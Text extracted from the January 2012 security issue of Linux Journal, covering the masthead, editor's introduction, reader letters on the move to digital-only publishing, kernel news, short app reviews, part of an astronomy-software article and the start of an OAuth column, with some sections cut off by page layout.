Linux Journal | January 2012 | Issue 213 - ACM Digital Library
INDEPTH
Using Linux with EFI, Part II: Preparing to Install on an EFI computer
Continuing the EFI story with a description of the steps you need to take before installing Linux on an EFI-based computer.
Roderick W. Smith

COLUMNS
Reuven M. Lerner’s At the Forge: Working with OAuth
Dave Taylor’s Work the Shell: More Twitter User Stats
Mick Bauer’s Paranoid Penguin: Eleven Years of Paranoia, a Retrospective
Kyle Rankin’s Hack and /: Password Cracking with GPUs, Part I: the Setup
Doc Searls’ EOF: Is There a “Personal Data Economy” If You Control Your Own Data?

REVIEW
SlickEdit
Shawn Powers

IN EVERY ISSUE
Current_Issue.tar.gz
Letters
UPFRONT
New Products
New Projects
Advertisers Index

LINUX JOURNAL (ISSN 1075-3583) is published monthly by Belltown Media, Inc., 2121 Sage Road, Ste. 310, Houston, TX 77056 USA. Subscription rate is $29.50/year. Subscriptions start with the next issue.
WWW.LINUXJOURNAL.COM / JANUARY 2012 / 5
Executive Editor: Jill Franklin, jill@linuxjournal.com
Senior Editor: Doc Searls, doc@linuxjournal.com
Associate Editor: Shawn Powers, shawn@linuxjournal.com
Art Director: Garrick Antikajian, garrick@linuxjournal.com
Products Editor: James Gray, newproducts@linuxjournal.com
Editor Emeritus: Don Marti, dmarti@linuxjournal.com
Technical Editor: Michael Baxter, mab@cruzio.com
Senior Columnist: Reuven Lerner, reuven@lerner.co.il
Security Editor: Mick Bauer, mick@visi.com
Hack Editor: Kyle Rankin, lj@greenfly.net
Virtual Editor: Bill Childers, bill.childers@linuxjournal.com

Contributing Editors
Ibrahim Haddad • Robert Love • Zack Brown • Dave Phillips • Marco Fioretti • Ludovic Marcotte • Paul Barry • Paul McKenney • Dave Taylor • Dirk Elmendorf • Justin Ryan

Proofreader: Geri Gale

Publisher: Carlie Fairchild, publisher@linuxjournal.com
Advertising Sales Manager: Rebecca Cassity, rebecca@linuxjournal.com
Associate Publisher: Mark Irgang, mark@linuxjournal.com
Webmistress: Katherine Druckman, webmistress@linuxjournal.com
Accountant: Candy Beauchamp, acct@linuxjournal.com

Linux Journal is published by, and is a registered trade name of, Belltown Media, Inc.
PO Box 980985, Houston, TX 77098 USA

Editorial Advisory Panel
Brad Abram Baillio • Nick Baronian • Hari Boukis • Steve Case • Kalyana Krishna Chadalavada • Brian Conner • Caleb S. Cullen • Keir Davis • Michael Eager • Nick Faltys • Dennis Franklin Frey • Alicia Gibb • Victor Gregorio • Philip Jacob • Jay Kruizenga • David A. Lane • Steve Marquez • Dave McAllister • Carson McDonald • Craig Oda • Jeffrey D. Parent • Charnell Pugsley • Thomas Quinlan • Mike Roberts • Kristin Shoemaker • Chris D. Stark • Patrick Swartz • James Walker

Advertising
E-MAIL: ads@linuxjournal.com
URL: www.linuxjournal.com/advertising
PHONE: +1 713-344-1956 ext. 2

Subscriptions
E-MAIL: subs@linuxjournal.com
URL: www.linuxjournal.com/subscribe
MAIL: PO Box 16476, North Hollywood, CA 91615-9911 USA

LINUX is a registered trademark of Linus Torvalds.
Current_Issue.tar.gz
SHAWN POWERS

My Voice Is My Passport, Verify Me

This is our security issue, and although we may not all have retinal scanners and voice-based authentication, we still need to focus on keeping our systems secure. We can all help the cause by using complex passwords and by using different passwords for every system to which we connect. In fact, Reuven M. Lerner starts us off with a possible solution to that very problem. He shows us how to use OAuth, so instead of creating a new set of credentials, we can log in to applications using an existing account. With OAuth, if you have a Yahoo, Google or Facebook account, you can log in to any Web site that allows OAuth authentication. It’s pretty cool stuff.

Twitter is another service that allows OAuth authentication, and although he doesn’t tackle authentication, Dave Taylor continues his series on scripting with Twitter. Can math and shell scripts determine whether someone is worth following? Read Dave’s column and find out.

Mick Bauer is back this month for one final Paranoid Penguin column. We’re very sad to see Mick go, but the security issue certainly seems like the perfect place for his retrospective on the past 11 years. Whether Mick’s column helps you sleep better at night or keeps you awake due to paranoia about your network, his monthly columns will be missed.

Kyle Rankin starts a series in this issue that likely will make you update the passwords on all your systems. Using his fancy GPU setup, Kyle shows how to do a brute-force attack (for legitimate purposes, of course) on our systems. It’s downright scary how powerful modern graphics cards are, and for tasks like password cracking, they are extremely efficient. Thankfully, Kyle can’t crack the combination on my luggage, and “one, two, three, four” is still safe there.

Continuing our black-hat-themed lineup, Matthew Agle describes how to do penetration testing on our systems. Although there isn’t one single tool for such things, Matthew opens his bag of tricks and lets us peek inside. Whether you are testing a Windows machine or trying to hack into your office server, Matthew explains how to do some pretty nasty stuff (for science, of course).

As if that weren’t scary enough, Himanshu Arora shows how to create a virus—a Linux virus. More specifically, it’s a Linux ELF-based virus that can propagate your system without you ever knowing it. This is the reason it’s important to have signed packages and check the md5sum for ISO images. Himanshu starts his series this month to help you understand, and then defend against, such things. Knowledge is power, even if sometimes that knowledge is unsettling.

If one of your concerns regarding managing secure passwords is that you can never remember them all, you need a tool like KeePassX. Anthony Dean shows how to use this cross-platform password management and generation tool to keep track of secure passwords. If your password is “password”, or if your idea of securing your “1234” password is to add a “5” at the end, you really don’t need KeePassX. You need a psychiatrist! Seriously though, KeePassX is a great tool to help with passwords, and Anthony walks us through using it.

We haven’t dedicated this entire issue to scaring you into being a paranoid penguin, however. Roderick W. Smith continues his series on using Linux with EFI systems. Last month, he explained EFI as the replacement for BIOS, and this month, he shows us how to use it to boot Linux. I also contributed an article this month, reviewing the Inspector Gadget of the editor world: SlickEdit. If you’re a programmer of any level, SlickEdit can make your life easier. It even helped me, a novice programmer at best.

We hope this issue is educational, and if nothing else, we hope you learn never to leave your server alone in a room with Kyle. He might claim his fancy video card is for playing games, but trust me, Kyle is not a gamer!

Shawn Powers is the Associate Editor for Linux Journal. He’s also the Gadget Guy for LinuxJournal.com, and he has an interesting collection of vintage Garfield coffee mugs. Don’t let his silly hairdo fool you, he’s a pretty ordinary guy and can be reached via e-mail at shawn@linuxjournal.com. Or, swing by the #linuxjournal IRC channel on Freenode.net.
Letters

Digital Switch

I feel like I’m preaching to the choir on this one, but I personally find the switch to all-digital to be more than annoying. I typically take a copy of LJ on a flight (try using a reader below the imaginary 10k feet), read it at a hotel (or at home in bed, after the boss falls asleep), or read it in some other “personal” area where a laptop or e-reader just isn’t practical.

While I’m sure you feel you’re offering choices, to me, I view it as an all-or-nothing proposition. I like both electronic and print, and I would pay additionally for the electronic content, but the push to all-electronic has me really aggravated. I bought a long-term subscription and simply will have to wait and see. There are other print publications that I’ve resisted, but I will subscribe to them in the future as I may just be too “old-school” to go electronic only.

I’ve seen murmurs from others, and I feel that this is a decision you should strongly reconsider—maybe offer a higher price for print and another for electronic? I personally don’t care if it’s on glossy paper and would settle for something just above newsprint. At least it’s an option without burning through expensive ink cartridges.
—Matt Avila

Unfortunately, as much as we dislike it ourselves, the switch to digital was an absolute necessity. The cost of maintaining a print edition was just too great, even with drastic increases to newsstand prices. It really wasn’t a decision whether to keep the print edition; it was a decision whether to keep producing Linux Journal at all. A digital Linux Journal seemed better than no Linux Journal, so that’s the route we took. Hopefully, based on those options, you’ll agree we chose the better of two evils.—Ed.

Get Rid of Two Columns

Since you are going all-digital, can you please get rid of the two-column format? It’s great when you can display a whole page (like with a print version or a big enough screen), but on anything else (which is about everything), it sucks. It is painful to have to scroll back up and down the same page to read the text. Please, please, please either bring back the print version or scrap the two-column layout.
—Joe

Hopefully, the .epub and .mobi formats we offer will fill this need. Although they are designed for electronic reading devices, it’s possible to view the single-column “flowing text” version on a computer using something like Calibre. You can check it out at http://www.calibre-ebook.com.—Ed.

A Former Subscriber

I’m sorry to say that since Linux Journal went from print to being an all-digital magazine, I’m canceling my subscription. The Linux Journal app for Android is buggy and not readable. I can suggest that you look at the Danish firm Visiolink Aps (http://www.visiolink.com), which makes Android/iOS and Web applications for magazines and newspapers. See, for example, eAdressa (a Norwegian newspaper) on both iOS and Android.
—Henrik Kirk

We’re certainly sad to lose you as a subscriber. The Android app has been a bit frustrating early into our foray into digital publishing. That’s actually one of the reasons we offer multiple formats for monthly consumption. If the Android app is buggy for you, perhaps the .epub edition will work? Regardless, I’m sorry you’re canceling. If you haven’t tried the alternate versions, please see if they work for you.—Ed.

Slitaz.org

I would like to see a writeup on Slitaz. This version loads on a Netbook from an SD Memory (4GB) card in approximately 15 seconds. The last version I downloaded didn’t like the 1024 x 600 display resolution on my machine but loaded okay using slitaz text to start it. It looked like one of the drivers was missing, but I do have it running on an older version of Slitaz.
The title page shows the motto “Boot, baby, boot!”
—Frank Anderson

Thanks, we’ll have to check it out!—Ed.

Response to the “Why, Why All-Digital” Letter in the November 2011 Issue

As a longtime subscriber to Linux Journal, when I heard of the all-digital format, I too had misgivings like the author of the “Why, Why All-Digital” letter. I also dislike reading long articles on a laptop. Because I intend to keep my subscription to LJ, I started looking at tablet computers. Laying out $500+ for an oversized tablet was not going to happen, so I started researching the NOOK Color. When I discovered you could install Android on it, I purchased a refurbished NOOK Color for less than $200 and, using a 4GB MicroSD memory card, dual-booted it with Android CyanogenMod. It’s the best investment I ever made. Not only do I have the PDF version of LJ at my fingertips, but I use it for tracking a number of my e-mail accounts and browsing the Web with its built-in wireless. In addition, I can boot in to the NOOK’s native Android and use the Barnes and Noble e-reader.

You may want to do a short article on how to adapt the NOOK Color into a dual-boot Android tablet for those of us out there who hate reading magazines on a laptop but don’t want to lug around an overpriced tablet.
—llmercy

I think perhaps some tablet-hacking articles are in order. It seems that we’ve finally arrived at the point in history when electronic reading devices are affordable. With the Kindle Fire and the various NOOK options, tablet computers are almost cheaper than cell phones!—Ed.

Digital Subscription? Sweet!

At first I thought that Linux Journal’s conversion to an all-digital publication format couldn’t be worse, but then I was deployed to Afghanistan. Now I couldn’t be more pleased with it. It takes forever to get mail out here, and that’s assuming it doesn’t get lost on the way. With the new digital format, I now get my Linux Journal quickly, and I can read it on my Kindle! Excellent! You’ve made the life of one data Marine easier. Thanks, Linux Journal!
—Jaymason Gallien

Jaymason, that’s great to hear! I’m glad the timing worked out well. Thank you for all you do, and stay safe.—Ed.

New Digital-Only Version

I just signed up for another year on my subscription. For those of us who have collected every print copy since the beginning of time, will we need to download and save each new issue, or will the links be good for the foreseeable future, so we can simply retrieve an older copy from the LJ Web site when needed?
—Bill K.

As long as you are an active subscriber, you will have access to the archive (from 2005 to the current issue).
The easiest way to get into the archives is via the link in the issue notification e-mail you receive each month. In the past, the link said “issue archive”, but it’s been modified to say “Missing a back issue?”. Otherwise, you can log in using your subscription ID and postal code at http://www.linuxjournal.com/digital.

Digital LJ Rocks

I’ve been a subscriber for a couple years, and I always have received the digital version and not the hard copy. I was surprised by the outcry in the November issue’s Letters. I get too many magazines these days that I hate to recycle, but I just don’t have the storage. With digital LJ, I can store as many as I want to on my computer. Now that .mobi versions are available, I can steal my wife’s Kindle and enjoy it there too. I just wish the other magazines I read would do something similar.
—Eric

Thanks Eric! It’s great to hear a digital subscriber is taking advantage of the new formats as well. I’m not brave enough to steal my wife’s Kindle, however, so good luck with that.—Ed.

Many, Many Thanks for the epub/Kindle Format!

Like many others, I would like to thank you very much for the electronic transition of LJ. With this move, you not only saved many trees, but also improved greatly my reading experience with my Kindle on which LJ renders perfectly (and it runs Linux too)! I also agree with other LJ readers: I think that Zack Brown’s diff -u is one of the most interesting parts of LJ and the main cause of my LJ addiction. And I want more! A more expanded kernel section with a new non-kernel FLOSS news diff -u section should be enough of a dose to calm me for a month. Ciao dall’Italia!
—Marco Ciampa

Thanks Marco. The epub/mobi edition was the most exciting part of the transition for me too.—Ed.

Another Response to the “Why, Why All-Digital” Letter

As a person who worked at an academic library re-shelving books and journals, I know firsthand about the huge amount of energy that is consumed moving paper from point A to point B. From September to April, I would lose ten pounds of weight. This time frame included the usual weight-gaining events called Thanksgiving and the Christmas holidays.

Consider the journey a piece of paper takes from the forest to your desktop and the fossil fuel burned moving it.
This includes all of the machinery at the paper mill to the printing press to the trucks on the road transporting paper between the various stages of the process.

How long can we keep this up? Obviously, energy costs are forcing the price of printed media up and shrinking profit margins in the process. It is now beyond an environmental issue and an economic issue as well.

We can’t avoid burning energy, be it electronic readers or my computer. At least for Linux Journal, going digital may have been the only way to keep going. So far, for me, the transition has been painless. Yes, I will miss the paper edition, just as I miss the Saturday newspaper. I have a very comfortable reading chair in front of my computer screen, and by increasing the font size a bit, I am enjoying reading off the screen.
—John Kerr

John, another advantage you point out very well is how much closer the content provider is to the consumer. With the digital edition, there are fewer steps (and less time) between when articles are written and when they are delivered. We must apologize for any weight gain our digital edition might cause though.—Ed.

Date Calculations

Dave Taylor says he did not know where to find a particular date formula. Well, all he needs to know about dates (and more) is in “Calendrical Calculations” by Dershowitz and Reingold.
—David Anderson

rsync Backups

I enjoyed Daniel Bartholomew’s low-power file-server article, although the thought of running a file server on external USB 2 drives doesn’t really appeal to me—perhaps when USB 3 is more pervasive or something similar with eSata.

I also wanted to point out that rsync itself can be used to perform backups using hard links to link to a previous backup. This is more efficient than the cp -al approach. I wrote a Ruby program called rubac to learn Ruby, but I’ve never really made this program public, perhaps after the next rewrite, but the basic idea is to point back to the previous backup using the rsync --link-dest=DIR option.

Also, I’m warming to your digital-only format, if only I can get my subscription status sorted out. Keep up the good work.
—oneguycoding

GNOME 3.2

I didn’t like GNOME 3.0, especially in F15. It was terrible at best in Ubuntu 11.10, but better than it was in F15. I don’t like Unity either. I use Mint 11. When I say I don’t like them, I mean, I don’t think they were usable from my standpoint or maybe enjoyable to use.

I loaded F16 yesterday. I really like GNOME 3.2 in F16. All the little annoyances that were there in 3.0 are gone. It still has some problems, changing themes, screensaver and background are way harder than they should be.
So is moving the dock around and adding menus in the activities menu—definitely a lot of polish is needed. But, I really, really, really like GNOME 3.2. This is a Windows killer.
—Shane Skoglund

I’ve been a public Unity-hater for quite some time, and my experience with GNOME 3 wasn’t much better. I haven’t looked at Fedora 16 yet, so I’ll have to give it a try. Thanks for the info!—Ed.

I Paid for a Print Subscription

I can understand that print and mailing are large costs in publishing, so I understand your desire to go digital. My beef with your decision is that I can get a lot of the information that you are creating free from a variety of on-line sources. I paid for a year subscription to get it in print form. Had I known that you would be going digital, I would not have renewed my subscription. Since digital delivery is significantly less expensive than print, I can only see greed in charging the same amount for a subscription that used to be in print form. I am truly disappointed.
—Richard Franczak

I’ve responded to similar concerns many times during the past few months, so I’ll just reiterate. It wasn’t a decision based on which method made more money; it was a decision based on whether to continue publishing at all. It’s not ideal, but we’re trying to offer multiple formats in an attempt to make Linux Journal useful for everyone.—Ed.
Electronic Publication Cover

When I opened my first electronic-only issue, I naturally clicked on the textual teasers on the cover. Nothing happened. Now that you are publishing only in electronic format, you could make the areas of the cover proclaiming content inside direct links to the associated content. The table of contents would still serve its usual purpose, but the cover links would go directly to sometimes not-so-obvious places. It would reduce the frustration of trying to figure out what is referenced by the cover.

Keep adapting and innovating. I enjoy the format of a magazine to discover things I would not otherwise have sought or discovered.
—Mark

That’s brilliant. And, now we’ve implemented your idea in our PDF and enhanced PDF versions. Thanks for the great idea!—Ed.

PDF Format Adapted to Kindle

I’ve been a subscriber to LJ pretty much from the beginning. May I propose that you adapt the PDF layout of LJ in such a way to be well suited to the Kindle e-book reader? Specifically, it would be convenient if you could adapt the column width so that with 200% zoom on a Kindle, one could read first the left column and then the right column. Today, the right column is too far to the right and is cut off. I guess such a change would benefit also all other readers with a 200%-zoom factor.
—Robert

Robert, if you haven’t tried the .mobi version of the magazine, please do. It’s designed specifically for e-readers, so the text flows to fit your screen size and font preference. The PDF version still is designed with the print-size layout, but the .mobi and .epub versions should look much nicer on your Kindle.—Ed.

Why I Came Back (after So Many Years)

For many years, I subscribed to Linux Journal. Then I canceled my subscription. The reason was not because of the quality of your magazine. On the contrary, I have always considered Linux Journal to be a quality magazine with well-written and interesting articles. The reason was paper, quite simply. I got tired of storing paper magazines or throwing them into a waste bin, and I canceled all my subscriptions to any printed magazines. So I congratulate you on your choice to drop the printed version altogether and continue as a purely digital magazine. That is why I came back and decided to start subscribing again, because I want to support your efforts on distributing quality Linux content in the future.

However, I have read that many people have been irritated by this change. People are entitled to think whatever they want, but I think this is the best choice for the future. It is ecologically a better choice. The digital magazine is delivered instantly. I do not have to wait several weeks for the printed magazine to drop in my mailbox. Digital magazines do not take any physical storage space. You can carry dozens of magazines in your tablet or smartphone and read them wherever you want.

Some people might say that the digital format makes Linux Journal obsolete, because you supposedly can find the same information on the Internet. I do not think that is true. I think the key word in this matter is trust. Can you really trust that the information on some obscure Web page or forum is accurate, up to date and unbiased? Usually, I find them to be hugely inaccurate, erroneous, out of date or heavily biased. However, in the case of Linux Journal, I can assume that articles have gone through a normal editorial process, which makes them more reliable as an information source—something that I can trust. Whether Linux Journal is printed or purely digital does not change that.
—Mika Laaksonen

Welcome back, Mika! We do try to offer the same quality content we’ve always offered, just in a digital format. We try to provide value for our customers, and although the switch to digital is frustrating in some ways, it allows us some freedom we never had before. We’re excited about the future!—Ed.

WRITE LJ A LETTER: We love hearing from our readers.
Please send us your comments and feedback via http://www.linuxjournal.com/contact.

At Your Service

SUBSCRIPTIONS: Linux Journal is available in a variety of digital formats, including PDF, .epub, .mobi and an on-line digital edition, as well as apps for iOS and Android devices. Renewing your subscription, changing your e-mail address for issue delivery, paying your invoice, viewing your account details or other subscription inquiries can be done instantly on-line: http://www.linuxjournal.com/subs. E-mail us at subs@linuxjournal.com or reach us via postal mail at Linux Journal, PO Box 16476, North Hollywood, CA 91615-9911 USA. Please remember to include your complete name and address when contacting us.

ACCESSING THE DIGITAL ARCHIVE: Your monthly download notifications will have links to the various formats and to the digital archive. To access the digital archive at any time, log in at http://www.linuxjournal.com/digital.

LETTERS TO THE EDITOR: We welcome your letters and encourage you to submit them at http://www.linuxjournal.com/contact or mail them to Linux Journal, PO Box 980985, Houston, TX 77098 USA. Letters may be edited for space and clarity.

WRITING FOR US: We always are looking for contributed articles, tutorials and real-world stories for the magazine. An author’s guide, a list of topics and due dates can be found on-line: http://www.linuxjournal.com/author.

FREE e-NEWSLETTERS: Linux Journal editors publish newsletters on both a weekly and monthly basis. Receive late-breaking news, technical tips and tricks, an inside look at upcoming issues and links to in-depth stories featured on http://www.linuxjournal.com. Subscribe for free today: http://www.linuxjournal.com/enewsletters.

ADVERTISING: Linux Journal is a great resource for readers and advertisers alike. Request a media kit, view our current editorial calendar and advertising due dates, or learn more about other advertising and marketing opportunities by visiting us on-line: http://ww.linuxjournal.com/advertising. Contact us directly for further information: ads@linuxjournal.com or +1 713-344-1956 ext. 2.
UPFRONT
NEWS + FUN

diff -u
WHAT’S NEW IN KERNEL DEVELOPMENT

The kernel.org break-in continues to inconvenience developers, although the various pieces do seem to be getting picked up. A lot of git repositories are returning to kernel.org as their maintainers submit credentials into the new GPG “web of trust” that is designed to reassure the kernel.org administrators that git tree maintainers are who they say they are. Linus Torvalds also has endorsed the web of trust by asking people sending him pull requests to make sure their repositories are hosted on kernel.org, so he can trust their identity.

Establishing a web of trust is not the easiest thing to manage. A lot of key-signing events have been announced all over the world, but some people don’t live close to any of those events and may have a hard time getting their keys signed, without which they won’t be allowed to maintain git repositories on kernel.org.

Another difficulty is that people within the web of trust might have a security breach on their personal systems, which could result in their private GPG keys being compromised. Greg Kroah-Hartman recently posted tips on how to avoid that at https://lkml.org/lkml/2011/9/30/425. Greg admonished, “it is imperative that nobody falls victim to the belief that it cannot happen to them.”

An important thing to remember about all of these security measures is that they don’t impact regular contributors who want to submit patches to the kernel. You can all still send your patches to the mailing list with no problem. The web of trust is intended only for people maintaining git repositories on kernel.org, because those people will have to be trusted by the kernel.org administrators not to taint those repositories.

VirtualBox came under some heavy criticism recently. Dave Jones remarked that a lot of kernel bug reports were due to VirtualBox corrupting memory and having weird crashes. He posted a patch to taint any kernel that had VirtualBox loaded, so that any automated bug-collecting tools could choose to ignore bug reports coming in from those systems.

Greg Kroah-Hartman approved of Dave’s patch, and the conversation proceeded to the point where people were suggesting that all out-of-tree patches should be tainted in a similar way.

Eventually Frank Mehnert, the VirtualBox maintainer, responded to the complaints against VirtualBox. He said, “We always have had good relations to the Open
They Said It

A computer once beat me at chess, but it was no match for me at kick boxing.
—Emo Philips

As a rule, software systems do not work well until they have been used, and have failed repeatedly, in real applications.
—Dave Parnas

Computer science is no more about computers than astronomy is about telescopes.
—Edsger Dijkstra

Computers make it easier to do a lot of things, but most of the things they make it easier to do don’t need to be done.
—Andy Rooney

Computing is not about computers any more. It is about living.
—Nicholas Negroponte

gStrings in Your Pocket

What may sound like a perverse concept is actually one of the many ways smartphones can change your life. If you play a musical instrument but don’t happen to have perfect pitch (most of us, sadly), you can buy a tuner, pitch pipe, tuning fork or any number of other aids to keep yourself in tune. If you have a smartphone in your pocket, however, you also can simply download gStrings. Available in the Android Marketplace in either a free ad-supported version or an inexpensive ad-free version, gStrings will help you tune any number of instruments accurately.

Although it’s certainly no replacement for perfect pitch, having a tuner in your pocket is very convenient if you’re a musician. Quite a few tuning apps are available for Android, but I’ve used gStrings personally, and it works great: https://market.android.com/details?id=org.cohortor.gstrings.
—SHAWN POWERS
LinuxJournal.com

Have you visited LinuxJournal.com lately? Check out http://www.linuxjournal.com/tag/security for helpful information on everything from configuring firewalls, to DNS cache poisoning, to packet sniffing. There are several great article series and tutorials to help get you over many of your security hurdles.

Don’t miss Mick Bauer’s “DNS Cache Poisoning, Part I” (http://www.linuxjournal.com/article/11008) and “DNS Cache Poisoning, Part II: DNSSEC Validation” (http://www.linuxjournal.com/article/11029) from our archives.

Greg Bledsoe’s “Back from the Dead: Simple Bash for Complex DdoS” (http://www.linuxjournal.com/content/back-dead-simple-bash-complex-ddos) also may come in handy in a bind.

And, for a quick tip, take a look at Shawn Powers’ video “Quick and Dirty SSH Tunneling” (http://www.linuxjournal.com/video/quick-and-dirty-ssh-tunneling).
—KATHERINE DRUCKMAN
Figure 2. You can set the time so it’s later, letting you check out what you might want to look for that evening.

script files there, along with any textures they may require, they will show up within the list of scripts in the configuration window. A plugin architecture also is available, but it is much harder to use, and the API varies from version to version.

The nice thing about Stellarium is that it isn’t limited to your computer. It can interact with the real world in a couple ways. The first is through telescope control. Stellarium provides two different mechanisms for controlling your telescope. The older mechanism is a client-server model. The server runs as a standalone application that connects to and controls one telescope. It then can listen to one or more clients, which can include Stellarium. Several options are available for the server portion, and they provide control for many telescopes from Meade, Celestron and others. The second mechanism is a plugin for Stellarium, which first was available in version 0.10.3. This mechanism can send only slew instructions to the telescope, which essentially are “go to” instructions. One major warning is that Stellarium will not stop you from slewing to the sun. This could damage both eyes and equipment if you don’t have proper filters on your telescope, so always be careful if you are working during the day. The plugin can interact with pretty much any telescope that understands either the Meade LX200 interface or the Celestron NexStar interface.

Figure 3. The configuration window lets you download even more star catalogs.

The other way Stellarium can interact with the real world is as a planetarium. Stellarium can handle the calculations involved in projecting over a sphere. This way, you can make a DIY planetarium. You need a dome onto which you can project your display across the inside. You also need a video projector and a spherical security mirror.
Use the spherical distortion feature in Stellarium and then project the results through the video projector and onto the mirror. Then, you can lie back under the dome and see the sky above you. The Stellarium Web site (http://www.stellarium.org) has links to groups on the Internet where you can find help and hints when building your own planetarium.

The other popular astronomy program is Celestia. Celestia is a three-dimensional simulation of the universe. Where most astronomy software shows you what the sky looks like from the surface of the Earth, Celestia can show you what the sky looks like from anywhere in the solar system.

Figure 4. When you first open Celestia, you get a satellite-eye view of the Earth.

Celestia has a powerful scripting engine that allows you to produce tours of the universe. When you install Celestia, you get a script called demo.cel that gives you an idea of its capabilities. The add-on section of the Celestia Web site (http://www.shatters.net/celestia) includes a full repository of available scripts.

Because so much work has been done to make it as scientifically accurate as possible, it also is being used in educational environments. Currently, 12 journeys are available that provide information for students and the general public on the wonders of the universe. As opposed to scripts, journeys give you more control over your speed and pace, allowing you to take more time at the areas that are of most interest to you.

Figure 5. When you want to go to an object, you can set what object you want to go to and how far away you are.

When you install Celestia, you get the core part of the program and a few extra add-ons. Currently, more than 500 add-ons are available, and if you install them all, you will need more than 18GB of drive space. The main repository you should check out first is located at http://www.celestiamotherlode.net.

If you want to travel to another planet in the solar system, you can click on Navigation→Go to Object. Here you can enter the name of the object and how far away you want to be. Then, click on Go To, and you’ll be taken there directly.
Once you’re there, you can rotate your camera view with the arrow keys. In this way, you can go to Mars and turn around and see what the sky looks like from there.

Figure 6. You can zoom in to see the Great Red Spot on Jupiter.

Figure 7. You can look out and see the night sky on Mars.

If you want to move around the orbit of the body you’re currently at, you can use the Shift and arrow keys to slide around and see the whole surface. What you see when you are in orbit around another planet is a texture mapped onto the body. Celestia’s core installation includes a minimal set of textures that strive to be as accurate as possible. You can change the textures being used by including add-ons from the repository. Some of these include textures that allow you to see what the Earth may have looked like during the last Ice Age or even four billion years ago.

In 2007, Vincent Giangiulio created an add-on called Lua Edu Tools. This add-on provides all kinds of extra functionality to Celestia. A toolkit is displayed on the right side of the screen that provides sliders for controlling many of Celestia’s parameters. It also provides a “cockpit” overlay, making it feel even more like you’re flying through space. The default texture is the space shuttle, but you can use other ones too. Celestia also lets you use a joystick to control movement, so you can immerse yourself completely into your dream of flying through space.

You can share your experiences with others by saving still images or movies. If you click on File→Capture Image, Celestia lets you save a PNG or JPEG image file. Clicking on File→Capture Movie lets you save a movie of your travels. You can set the aspect ratio, the frame rate and the video quality. Once you click Save, Celestia will be ready to start recording. When you are ready, click the F11 key to start recording. When you’re done, you can stop recording by clicking F12.

This article is only an introduction to what you can do. Hopefully, it inspires you to go explore the universe on your desktop.
From there, bundle up and go spend the night out under the skies. You won’t regret it.
—JOEY BERNARD
Fade In Pro

When I switched from Windows to Linux, I found software to replace almost everything I had been doing in Windows. Most of the software I needed was in the repos, although I did pay for a couple commercial programs.

The most difficult program to replace was Final Draft, a commercial program for writing screenplays. Final Draft is available for Windows and Macs, but not for Linux. It also does not run in Wine or CrossOver Office.

I understand that software for writing screenplays is a small niche, but it’s not limited only to writers in Hollywood. Any company that prepares videos for training or other purposes would benefit from a program that helps write scripts.

You can write scripts with a word processor, of course. But, the formatting is tricky and goes beyond what you can accomplish just by using styles. A dedicated script-writing tool ensures that all your formatting is correct, and it also can help in other ways.

At first, I was able to get by with Celtx, a free screenplay program that is available for Windows, Mac and Linux. But a nasty bug crept into the Linux version, making it painful to enter character names for dialogue. Although the developer acknowledged the issue two years ago, and several new versions have been released since then, the bug is still there.

A new solution now is available. Fade In Professional Screenwriting Software is a powerful application for writing screenplays, and it includes tools for organizing and navigating the script, as well as tools for managing revisions and rewrites.

Fade In intelligently handles the various formatting elements of a screenplay. You can format the elements manually using key combinations or menus, or you can format everything just by using the Enter and Tab keys. Type a Scene Heading and press Enter, and the next element automatically is formatted as Action.
Press Tab to change the formatting to Character, which automatically is followed by Dialogue. Press Tab to change from Dialogue to Parenthetical, which formats properly and inserts the parentheses.

Fade In builds autocomplete lists of your characters and locations. Once you’ve written a character or location, you can re-enter it with a couple keystrokes.

When it’s time to produce a screenplay, Fade In can help by generating standard production reports including scenes, cast, locations and so on. You then can print these reports or save them to HTML or CSV.

Fade In can import and export files in these formats: Final Draft, Formatted Text, Screenplay Markdown, Unformatted Text and XML. It also can import files in Celtx or Rich Text Format and export to PDF and HTML. The Final Draft format is particularly important if you want to sell your script or submit it to certain screenplay-writing contests.

Fade In is not free. According to the Web site, the regular price is $99.95, although at the time of this writing, you can get it for $49.95. Either way, it’s much cheaper than $249 for Final Draft. You can download the demo and try it first, then buy it if the software works for you.

There also are versions of Fade In for mobile devices: Android, iPhone and iPad.

You can download the Linux version as a DEB, RPM or tar.gz file in either 32-bit or 64-bit versions.

Check it out at http://www.fadeinpro.com.
—CHARLES OLSEN
You Need A Budget

(Image from: www.youneedabudget.com)

This time of year is often rough on finances, and although there are many money-management tools available for Linux, none are quite like You Need A Budget, or YNAB for short. Unlike traditional budgeting programs, YNAB focuses on a few simple rules to help you get out of debt and, more important, to see where your money is going. If you’ve ever struggled with sticking to a budget (I certainly have), give YNAB a try. I’m not a “numbers person”, yet YNAB seems to make sense.

YNAB is an Adobe Air-based application, so it runs on Windows, Macintosh and Linux. It’s not free, but there’s a seven-day trial and a 30-day money-back guarantee. There’s even an app in the Android Marketplace that will sync with your desktop application for entering purchases on the go. YNAB isn’t for everyone, but if you’ve ever struggled with budgeting and been frustrated that most finance applications are Windows-only, give YNAB a try: http://www.youneedabudget.com.
—SHAWN POWERS
Casper, the Friendly (and Persistent) Ghost

Creating a live Linux USB stick isn’t anything new. And, in fact, the ability to have persistence with a live CD/USB stick isn’t terribly new. What many people might not be aware of, however, is just how easy it is to make a bootable USB stick that you can use like a regular Linux install. Using the “Startup Disk Creator” in any of the Ubuntu derivatives, creating a bootable USB drive with persistence is as simple as dragging a slider to determine how much space to reserve for persistence!

The concept of persistence has come a long way too. The casper filesystem basically overlays the live USB session, so you actually can install programs in your live session and have those programs remain installed the next time you boot. The same is true with files you might create and store in your home directory as well. If you’ve ever liked the concept of a live USB, but felt limited by the default set of applications, persistence is for you. In fact, with a sizable USB stick and a little more work, you can make a multiboot USB stick with persistence as well.
—SHAWN POWERS
COLUMNS
AT THE FORGE

Working with OAuth

REUVEN M. LERNER

Want your users to be able to log in via Facebook, Twitter or Google+? OAuth is the answer!

Like many software developers (and people in general), I’m something of a hypocrite. When I’m working with clients, I tell them how important it is to have secure passwords, how they should use a different password on every site, and how they should force their users to have secure passwords as well. And although I often do use different passwords for different sites and try to change them on a semi-regular basis, the fact is that I can remember only so many different ones and end up reusing a number of them in different variations and at different times. Better (or worse) yet, I don’t need to remember these passwords, because my browser can and often will do it for me.

Now, this clearly is a problem, because it means if others crack one of my reused passwords, they might (depending on the password in question) be able to access a number of other systems around the world, from sites where I shop to servers I help operate.

